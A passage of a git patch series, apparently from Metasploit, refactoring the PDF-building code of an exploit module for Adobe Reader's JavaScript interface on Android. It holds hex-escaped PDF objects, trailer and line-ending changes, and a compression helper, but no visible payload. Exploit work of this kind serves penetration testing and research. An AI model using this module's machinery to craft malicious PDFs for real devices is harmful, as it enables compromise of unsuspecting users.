"\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") - - @xref_offset = @pdf.length - @pdf << xref_table << trailer(25, eol) << startxref - - @pdf - end end end From 9f5dfab9ea05e02a1ac92540233adca412fb873d Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 16:14:52 -0500 Subject: [PATCH 460/853] Add better interface for specifying custom #eol. --- lib/msf/core/exploit/pdf.rb | 4 ++++ .../android/fileformat/adobe_reader_pdf_js_interface.rb | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 19b9a9204a..3cf02f4bee 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -206,6 +206,10 @@ module Exploit::PDF @eol || "\x0d\x0a" end + def eol=(new_eol) + @eol = new_eol + end + def endobj "endobj" << eol end diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index 9f1dd2c4c1..b5d44669f6 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def pdf(js) - @eol = "\x0d" + self.eol = "\x0d" @xref = {} @pdf = header('1.6') From cf6b1819597f71df65e3e0e269d54046f5f6f346 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 17:47:54 -0500 Subject: [PATCH 461/853] Revert change to trailer(). Kill dead method. * I verified that changes to PDF mixin do not affect any older modules that generate PDF. I did this by (on each branch) running in irb, then running the module and diffing the pdf's generated by each branch. There were no changes. --- lib/msf/core/exploit/pdf.rb | 11 +++-------- .../fileformat/adobe_reader_pdf_js_interface.rb | 7 ++++++- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 3cf02f4bee..1a1bcc8528 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -160,11 +160,6 @@ module Exploit::PDF @pdf << endobj end - def range_rand(min,max) - until min < r=rand(max); end - return r - end - def finish_pdf @xref_offset = @pdf.length @pdf << xref_table @@ -190,9 +185,9 @@ module Exploit::PDF ret end - def trailer(root_obj, space='') - id = @xref.keys.max+1 - "trailer" << space << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol + def trailer(root_obj) + ret = "trailer" << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj) << ">>" << eol + ret end def startxref diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index b5d44669f6..aaaa7d3184 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -71,6 +71,11 @@ class Metasploit3 < Msf::Exploit::Remote file_create(pdf(js)) end + def trailer(root_obj) + id = @xref.keys.max+1 + "trailer" << eol << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol + end + def pdf(js) self.eol = "\x0d" @xref = {} @@ -119,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") @xref_offset = @pdf.length - @pdf << xref_table << trailer(25, eol) << startxref + @pdf << xref_table << trailer(25) << startxref @pdf end From 04ac07a2164bbecf700a89078eba21562082eebb Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Mon, 2 Jun 2014 23:06:46 -0500 Subject: [PATCH 462/853] Compress and base64 data to save bytes. Reduced file size from 43kb to 12kb, yay. --- .../adobe_reader_pdf_js_interface.rb | 78 ++++++++++--------- 1 file changed, 41 insertions(+), 37 deletions(-) diff --git a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb index aaaa7d3184..f3e6c6c124 100644 --- a/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb +++ b/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb @@ -76,52 +76,56 @@ class Metasploit3 < Msf::Exploit::Remote "trailer" << eol << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol end + def add_compressed(n, data) + add_object(n, Zlib::Inflate.inflate(Rex::Text.decode_base64(data))) + end + def pdf(js) self.eol = "\x0d" @xref = {} @pdf = header('1.6') - add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") - add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(3, "\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\x75\x75\x69\x64\x3a\x39\x64\x38\x35\x36\x39\x65\x65\x2d\x37\x66\x64\x38\x2d\x34\x34\x62\x61\x2d\x39\x63\x38\x63\x2d\x36\x65\x35\x32\x32\x35\x33\x35\x39\x62\x61\x35\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\x75\x75\x69\x64\x3a\x34\x63\x37\x30\x34\x36\x62\x34\x2d\x30\x34\x39\x33\x2d\x39\x30\x34\x62\x2d\x61\x35\x35\x32\x2d\x64\x63\x31\x37\x38\x32\x63\x62\x33\x62\x62\x31\x3c\x2f\x78\x6d\x70\x4d\x4d\x3a\x49\x6e\x73\x74\x61\x6e\x63\x65\x49\x44\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x3c\x2f\x70\x64\x66\x3a\x50\x72\x6f\x64\x75\x63\x65\x72\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\xd\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\xd\x3c\x2f\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x65\x6e\x64\x3d\x22\x77\x22\x3f\x3e\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") - add_object(32, "\xd\x3c\x3c\x2f\x49\x44\x53\x20\x31\x37\x20\x30\x20\x52\x2f\x55\x52\x4c\x53\x20\x31\x38\x20\x30\x20\x52\x3e\x3e\xd") - add_object(7, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x32\x2f\x46\x69\x72\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x38\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x3e\x3e\xd") - add_object(16, 